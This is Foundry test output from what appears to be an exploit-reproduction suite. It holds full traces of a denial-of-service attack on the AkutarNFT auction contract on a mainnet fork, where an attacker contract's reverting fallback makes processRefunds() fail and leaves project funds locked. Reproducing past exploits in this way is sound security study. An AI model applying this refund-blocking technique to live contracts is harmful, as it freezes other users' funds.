Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.19s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 1.56s (4.30ms CPU time)

Ran 2 tests for src/test/2022-04/AkutarNFT_exp.sol:AkutarNFTExploit
[PASS] testDOSAttack() (gas: 502009)
Logs:
  honestUser Balance before Bid:  4
  honestUser Balance after Bid:  0
  processRefunds() REVERT :  Failed to refund bidder
  honestUser Balance post processRefunds:  0

Traces:
  [5830] AkutarNFTExploit::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 14636844 [1.463e7])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [502009] AkutarNFTExploit::testDOSAttack()
    ├─ [0] VM::prank(AkutarNFTExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   └─ ← [Return]
    ├─ [68163] 0xF42c318dbfBaab0EEE040279C6a2588Fa01a961d::bid{value: 3500000000000000000}(1)
    │   ├─  storage changes:
    │   │   @ 0xcbca2c2e1a1577eb2e25b9dce980a2cead88d4a5422449a454760a1d38d5b82a: 0 → 24
    │   │   @ 8: 34 → 35
    │   │   @ 9: 0x0000000000000000000000000000000000000000000000067374ed82cf7c0000 → 0x000000000000000000000000000000000000000000000006a4076cf7995a0000
    │   │   @ 0x7ca528807b45d0675df0059116d2304ca9c7f495d9ab623cd80c79f11948b856: 0 → 0x0001000030927f74c9de00007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   @ 7: 24 → 25
    │   └─ ← [Stop]
    ├─ [0] console::log("honestUser Balance before Bid: ", 4) [staticcall]
    │   └─ ← [Stop]
    ├─ [0] VM::prank(0xca2eB45533a6D5E2657382B0d6Ec01E33a425BF4)
    │   └─ ← [Return]
    ├─ [17793] 0xF42c318dbfBaab0EEE040279C6a2588Fa01a961d::bid{value: 3750000000000000000}(1)
    │   ├─ [0] 0xca2eB45533a6D5E2657382B0d6Ec01E33a425BF4::fallback{value: 250000000000000000}()
    │   │   └─ ← [Stop]
    │   ├─  storage changes:
    │   │   @ 8: 35 → 36
    │   │   @ 0x7d35cc2b0520994422695eb24e3bf4f74e9cba2704cae72ecd9ec54409a56afb: 0x0001000030927f74c9de0000ca2eb45533a6d5e2657382b0d6ec01e33a425bf4 → 0x0002000030927f74c9de0000ca2eb45533a6d5e2657382b0d6ec01e33a425bf4
    │   │   @ 9: 0x000000000000000000000000000000000000000000000006a4076cf7995a0000 → 0x000000000000000000000000000000000000000000000006d499ec6c63380000
    │   └─ ← [Stop]
    ├─ [0] console::log("honestUser Balance after Bid: ", 0) [staticcall]
    │   └─ ← [Stop]
    ├─ [0] VM::warp(1650674809 [1.65e9])
    │   └─ ← [Return]
    ├─ [0] VM::prank(AkutarNFTExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   └─ ← [Return]
    ├─ [377470] 0xF42c318dbfBaab0EEE040279C6a2588Fa01a961d::processRefunds()
    │   ├─ [0] 0x96EA017109C7691a3080e16C2095B547e29d82f5::fallback{value: 6300000000000000000}()
    │   │   └─ ← [Stop]
    │   ├─ [0] 0xb7A4173fD350a28a52D99F7434316e212a385C5B::fallback{value: 2100000000000000000}()
    │   │   └─ ← [Stop]
    │   ├─ [0] 0xBc9c3b0bd4B17e57A2F4a7b72eb37b30A8782C71::fallback{value: 2100000000000000000}()
    │   │   └─ ← [Stop]
    │   ├─ [0] 0xfEA95b37a5e40812fedCCB84b3c54610085C1e89::fallback{value: 6300000000000000000}()
    │   │   └─ ← [Stop]
    │   ├─ [0] 0x0eAaEAb621b6718f0E2A486be5bc976Cb8cC3A9E::fallback{value: 4200000000000000000}()
    │   │   └─ ← [Stop]
    │   ├─ [0] 0x3128979AE4F79B90664520a83e20e0CC83e6E5C9::fallback{value: 2100000000000000000}()
    │   │   └─ ← [Stop]
    │   ├─ [0] 0x3aF7f85584184F63b533e547E255AE7265EE6A90::fallback{value: 6300000000000000000}()
    │   │   └─ ← [Stop]
    │   ├─ [0] 0xA8f056bF55FA15f326759BDED5439583fbA304C9::fallback{value: 6300000000000000000}()
    │   │   └─ ← [Stop]
    │   ├─ [0] 0x918270712eE5065b3e36eb5a331fFCd198058f57::fallback{value: 4200000000000000000}()
    │   │   └─ ← [Stop]
    │   ├─ [0] 0x6b37547ec97599b77388570a48bB6E193AA25F27::fallback{value: 2100000000000000000}()
    │   │   └─ ← [Stop]
    │   ├─ [0] 0x2b333AE41632c0266AE275e811bB5EeB3F21fd03::fallback{value: 4200000000000000000}()
    │   │   └─ ← [Stop]
    │   ├─ [0] 0x83aF5a649B2164F5e51b4F6D7e650426B35665f7::fallback{value: 4200000000000000000}()
    │   │   └─ ← [Stop]
    │   ├─ [0] 0x4862a36794d271bF7d5c5DA41D30e00684b0BAD6::fallback{value: 4200000000000000000}()
    │   │   └─ ← [Stop]
    │   ├─ [0] 0x491892CCDfBe0BB2ca35FFE442baDe74B6bD31ad::fallback{value: 2100000000000000000}()
    │   │   └─ ← [Stop]
    │   ├─ [0] 0x21Bb3Eb127B7b96f39E3e99B0Fb7F4051C4994a8::fallback{value: 2100000000000000000}()
    │   │   └─ ← [Stop]
    │   ├─ [0] 0xbE612fAaCf608E735ec40F059bfB9D921052a095::fallback{value: 2100000000000000000}()
    │   │   └─ ← [Stop]
    │   ├─ [0] 0xA83fA9c834BB5ABE25F9c56EB5845b3203Df94F2::fallback{value: 6300000000000000000}()
    │   │   └─ ← [Stop]
    │   ├─ [0] 0xca2eB45533a6D5E2657382B0d6Ec01E33a425BF4::fallback{value: 4200000000000000000}()
    │   │   └─ ← [Stop]
    │   ├─ [0] 0x703d6dbcEda7455D69349c659eDd37a39ebc8E7d::fallback{value: 2100000000000000000}()
    │   │   └─ ← [Stop]
    │   ├─ [43] AkutarNFTExploit::fallback{value: 2100000000000000000}()
    │   │   └─ ← [Revert] EvmError: Revert
    │   ├─  storage changes:
    │   │   @ 0x7d35cc2b0520994422695eb24e3bf4f74e9cba2704cae72ecd9ec54409a56afb: 0x0002000030927f74c9de0000ca2eb45533a6d5e2657382b0d6ec01e33a425bf4 → 0x0102000030927f74c9de0000ca2eb45533a6d5e2657382b0d6ec01e33a425bf4
    │   │   @ 0x3e5fec24aa4dc4e5aee2e025e51e1392c72a2500577559fae9665c6d52bd6a31: 0x0003000030927f74c9de000096ea017109c7691a3080e16c2095b547e29d82f5 → 0x0103000030927f74c9de000096ea017109c7691a3080e16c2095b547e29d82f5
    │   │   @ 0xf130046d53bc87538ab17e4752ba5f5082985eecc06ccb932c5a55e8242dd502: 0x0002000030927f74c9de00002b333ae41632c0266ae275e811bb5eeb3f21fd03 → 0x0102000030927f74c9de00002b333ae41632c0266ae275e811bb5eeb3f21fd03
    │   │   @ 0x75f96ab15d697e93042dc45b5c896c4b27e89bb6eaf39475c5c371cb2513f7d2: 0x0000000030927f74c9de00004fc2a3ebba243c67f862041a4c00f4f69a841f29 → 0x0100000030927f74c9de00004fc2a3ebba243c67f862041a4c00f4f69a841f29
    │   │   @ 0xaca6cdb4b5fe0ec50731a73f714dd191dc1911bfeb3f9eeb9e94ed0f6065ef8d: 0x0001000030927f74c9de00006b37547ec97599b77388570a48bb6e193aa25f27 → 0x0101000030927f74c9de00006b37547ec97599b77388570a48bb6e193aa25f27
    │   │   @ 0x697b2bd7bb2984c4e0dc14c79c987d37818484a62958b9c45a0e8b962f20650f: 0x0002000030927f74c9de00000eaaeab621b6718f0e2a486be5bc976cb8cc3a9e → 0x0102000030927f74c9de00000eaaeab621b6718f0e2a486be5bc976cb8cc3a9e
    │   │   @ 0x84a4048ee77615560f9afb39551a46e123dd0dd6c928af241dc565271d032569: 0x0002000030927f74c9de00004862a36794d271bf7d5c5da41d30e00684b0bad6 → 0x0102000030927f74c9de00004862a36794d271bf7d5c5da41d30e00684b0bad6
    │   │   @ 0x098d468efb4f874d617491296c759dc9ae46efb517fe36bcf30699ad3f714c0f: 0x0001000030927f74c9de0000be612faacf608e735ec40f059bfb9d921052a095 → 0x0101000030927f74c9de0000be612faacf608e735ec40f059bfb9d921052a095
    │   │   @ 0xeda6feebfb4ffb7de2d0dc45a13b92dc953c2ed6ee96fa7fe8179e7c4266747f: 0x0003000030927f74c9de0000a83fa9c834bb5abe25f9c56eb5845b3203df94f2 → 0x0103000030927f74c9de0000a83fa9c834bb5abe25f9c56eb5845b3203df94f2
    │   │   @ 0x6fac4587033fa036e2426ad0134940d3a683633cc2b2b7862f39195344f163d1: 0x0002000030927f74c9de000083af5a649b2164f5e51b4f6d7e650426b35665f7 → 0x0102000030927f74c9de000083af5a649b2164f5e51b4f6d7e650426b35665f7
    │   │   @ 0x4ced6d0d36392b04cc5d8761b1327b3bbba6e1089c77f60a9a9ca18e05e4f00e: 0x0000000030927f74c9de00007e52a3454c45bbed921757a33ccce379399d5afb → 0x0100000030927f74c9de00007e52a3454c45bbed921757a33ccce379399d5afb
    │   │   @ 0xb8d683c9d414f481826f3e7fe14b3ac6ae8c73450778287390c4bb8cb9f2e80b: 0x0001000030927f74c9de00003128979ae4f79b90664520a83e20e0cc83e6e5c9 → 0x0101000030927f74c9de00003128979ae4f79b90664520a83e20e0cc83e6e5c9
    │   │   @ 0xb72a5233413dd9985e70abb239a7ba917e489fbf2ece87f523c6e26971cc821f: 0x0001000030927f74c9de000021bb3eb127b7b96f39e3e99b0fb7f4051c4994a8 → 0x0101000030927f74c9de000021bb3eb127b7b96f39e3e99b0fb7f4051c4994a8
    │   │   @ 0x84f72166cd6dc886f96a4867c4575af2a636c629c04227c9418bfffa7a09a9ed: 0x0001000030927f74c9de0000703d6dbceda7455d69349c659edd37a39ebc8e7d → 0x0101000030927f74c9de0000703d6dbceda7455d69349c659edd37a39ebc8e7d
    │   │   @ 0xca4d0c6c94a9477136dd41a99cc19ecbe441c8f6609efe7c6fa65be007a47323: 0x0000000030927f74c9de0000e8b15c1fe4ec244eea5b17a9db675023a72c8bd3 → 0x0100000030927f74c9de0000e8b15c1fe4ec244eea5b17a9db675023a72c8bd3
    │   │   @ 0xee4750d043edce57577a49a1f0c4b389e3b8c38c27dc693bc6b7154c07280771: 0x0001000030927f74c9de0000491892ccdfbe0bb2ca35ffe442bade74b6bd31ad → 0x0101000030927f74c9de0000491892ccdfbe0bb2ca35ffe442bade74b6bd31ad
    │   │   @ 0x85291c2e7881182c13e19eca9b58927ebfdc2c5d04882018eeb33d8241d35711: 0x0000000030927f74c9de000078380670c5f1a6acabfa27bf56e459d3198fc5c2 → 0x0100000030927f74c9de000078380670c5f1a6acabfa27bf56e459d3198fc5c2
    │   │   @ 0x0b94fa1b86997cc1f1148bfbe25b674e8cefc7cc6f976aa8d7c7966bd4cca347: 0x0003000030927f74c9de0000a8f056bf55fa15f326759bded5439583fba304c9 → 0x0103000030927f74c9de0000a8f056bf55fa15f326759bded5439583fba304c9
    │   │   @ 0xbfd358e93f18da3ed276c3afdbdba00b8f0b6008a03476a6a86bd6320ee6938b: 0x0003000030927f74c9de0000fea95b37a5e40812fedccb84b3c54610085c1e89 → 0x0103000030927f74c9de0000fea95b37a5e40812fedccb84b3c54610085c1e89
    │   │   @ 0x7ca528807b45d0675df0059116d2304ca9c7f495d9ab623cd80c79f11948b856: 0x0001000030927f74c9de00007fa9385be102ac3eac297483dd6233d62b3e1496 → 0x0101000030927f74c9de00007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   @ 0x4da38fc8e544afc56a4c2a17752b8ddb67d8e23ac4583c9029d2e2d1dbe6c988: 0x0003000030927f74c9de00003af7f85584184f63b533e547e255ae7265ee6a90 → 0x0103000030927f74c9de00003af7f85584184f63b533e547e255ae7265ee6a90
    │   │   @ 0xc5069e24aaadb2addc3e52e868fcf3f4f8acf5a87e24300992fd4540c2a87eed: 0x0001000030927f74c9de0000bc9c3b0bd4b17e57a2f4a7b72eb37b30a8782c71 → 0x0101000030927f74c9de0000bc9c3b0bd4b17e57a2f4a7b72eb37b30a8782c71
    │   │   @ 0x248457bacb20e239ae314d8db91c0f270e453c28ee138c84f97aea6cfcf9a499: 0x0002000030927f74c9de0000918270712ee5065b3e36eb5a331ffcd198058f57 → 0x0102000030927f74c9de0000918270712ee5065b3e36eb5a331ffcd198058f57
    │   │   @ 0x8819ef417987f8ae7a81f42cdfb18815282fe989326fbff903d13cf0e03ace29: 0x0001000030927f74c9de0000b7a4173fd350a28a52d99f7434316e212a385c5b → 0x0101000030927f74c9de0000b7a4173fd350a28a52d99f7434316e212a385c5b
    │   └─ ← [Revert] revert: Failed to refund bidder
    ├─ [0] console::log("processRefunds() REVERT : ", "Failed to refund bidder") [staticcall]
    │   └─ ← [Stop]
    ├─ [0] console::log("honestUser Balance post processRefunds: ", 0) [staticcall]
    │   └─ ← [Stop]
    └─ ← [Stop]

[PASS] testclaimProjectFunds() (gas: 24527)
Logs:
  claimProjectFunds() ERROR :  Refunds not yet processed

Traces:
  [5830] AkutarNFTExploit::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 14636844 [1.463e7])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [24527] AkutarNFTExploit::testclaimProjectFunds()
    ├─ [0] VM::warp(1650672435 [1.65e9])
    │   └─ ← [Return]
    ├─ [0] VM::prank(0xCc0eCD808Ce4fEd81f0552b3889656B28aa2BAe9)
    │   └─ ← [Return]
    ├─ [8785] 0xF42c318dbfBaab0EEE040279C6a2588Fa01a961d::claimProjectFunds()
    │   └─ ← [Revert] revert: Refunds not yet processed
    ├─ [0] console::log("claimProjectFunds() ERROR : ", "Refunds not yet processed") [staticcall]
    │   └─ ← [Stop]
    └─ ← [Stop]

Suite result: ok. 2 passed; 0 failed; 0 skipped; finished in 19.36s (18.02s CPU time)

Ran 2 test suites in 19.38s (20.92s CPU time): 3 tests passed, 0 failed, 0 skipped (3 total tests)
